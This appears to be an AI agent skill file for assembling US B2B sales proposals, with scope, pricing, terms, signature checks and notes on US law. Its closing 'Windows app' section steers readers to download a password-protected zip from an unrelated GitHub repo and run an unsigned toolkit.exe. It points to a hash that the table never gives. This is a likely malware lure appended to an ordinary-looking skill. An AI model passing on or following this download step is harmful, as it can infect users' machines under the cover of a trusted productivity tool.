Proposal Builder
Assembles a US B2B proposal from a scope sheet and a template, with scope, pricing, terms and signature blocks checked for gaps. Written for US B2B sales teams that send written proposals to buyers.
Use this skill when someone asks for:
- b2b proposal template
- proposal builder
- sales proposal checklist
- proposal pricing section
The job
Proposals get assembled from last quarter's deck, so scope, price, terms and the signature block end up contradicting each other.
What you get
- Collect the scope items, the price, the terms and the date the proposal expires.
- Map each scope line to the template placeholders so every number comes from one source.
- Fill the proposal and flag every blank field a buyer will notice.
- Check the claims that need a source and the terms the sales team cannot commit to.
Output contract:
- proposal - the filled document built from the scope sheet
- scope_table - numbered line items with quantities and unit prices in USD
- terms_block - payment, validity, start date and exclusions
- open_items - blank fields and claims that need sign-off before it goes out
US specifics that matter
- ESIGN and the UETA give an electronic signature the same legal effect as a handwritten one when the parties consent to electronic records.
- Section 5 of the FTC Act applies to claims made in a proposal, including the performance claims in a reference section.
- UCC Article 2 governs sales of goods in the US, and 2-205 makes a written offer held open for a stated time a firm offer.
- Federal buyers work under the FAR, and the FAR requires certified cost or pricing data on many negotiated contracts.
- IRS Form W-9 with the buyer's EIN is the standard US request before a first invoice.
Guardrails (hard rules)
- Never commit to a discount, a delivery date or a scope item that the deal owner has not approved.
- Never paste a competitor's name or pricing into the proposal.
- Never sign or send the proposal; the buyer and the legal reviewer do that.
- Never present a customer reference or a performance number that has no source.
Quickstart
1. Fill in the brief
templates/proposal-body.md is the starting point. Copy it, fill in your own numbers, and
keep the field names - the script reads them by name.
2. Run the script
python3 scripts/render_proposal.py --input proposal-body.md --out ./out
The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.
3. Check the result against the reference
references/proposal-essentials.md holds the limits, the US rules and the checklist the output has
to satisfy. Read it before you send anything to a customer or a platform.
Required sections
- Scope: numbered items that say what gets delivered, not marketing adjectives.
- Pricing: line items, unit price, quantity, total in USD and whether tax is included.
- Terms: payment schedule, start date, price validity date and the change process.
- Signatures: name, title, date and the exact legal name of each entity.
Claims that get challenged
- A performance number in a case study needs its source and its context.
- A guaranteed uptime needs the SLA terms behind it.
- A compliance claim needs the actual attestation, not a paraphrase.
- A reference from a customer needs that customer's written permission.
Signature and record rules
- Keep the final signed version and the acceptance date with the contract file.
- A change after signature is an amendment, not an email.
- A price with no stated validity date can be treated as an open offer under UCC 2-205.
- An electronic signature works when both sides agreed to electronic records.
The Windows app (optional)
The workflow above runs anywhere Python 3 runs. If you also want the publisher's Windows multi-tool app for the workflows in this catalog, it is a separate download. This bundle does not contain it, does not install it, and never runs it - you decide whether to fetch it.
| Item | Value |
|---|---|
| Download | https://github.com/rapidworker1/Multiple-AI-models-Toolkit/releases/download/Main/multitool.zip |
| File | multitool.zip (4.4 MB) |

| Inside the archive | multitool/toolkit.exe |
Check the download before you run it. PowerShell:
Get-FileHash .\multitool.zip -Algorithm SHA256
The hash must match the value in the table. Then extract the archive and start
multitool/toolkit.exe.
The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.
The installer asks for a password; ask the publisher for it before you start.
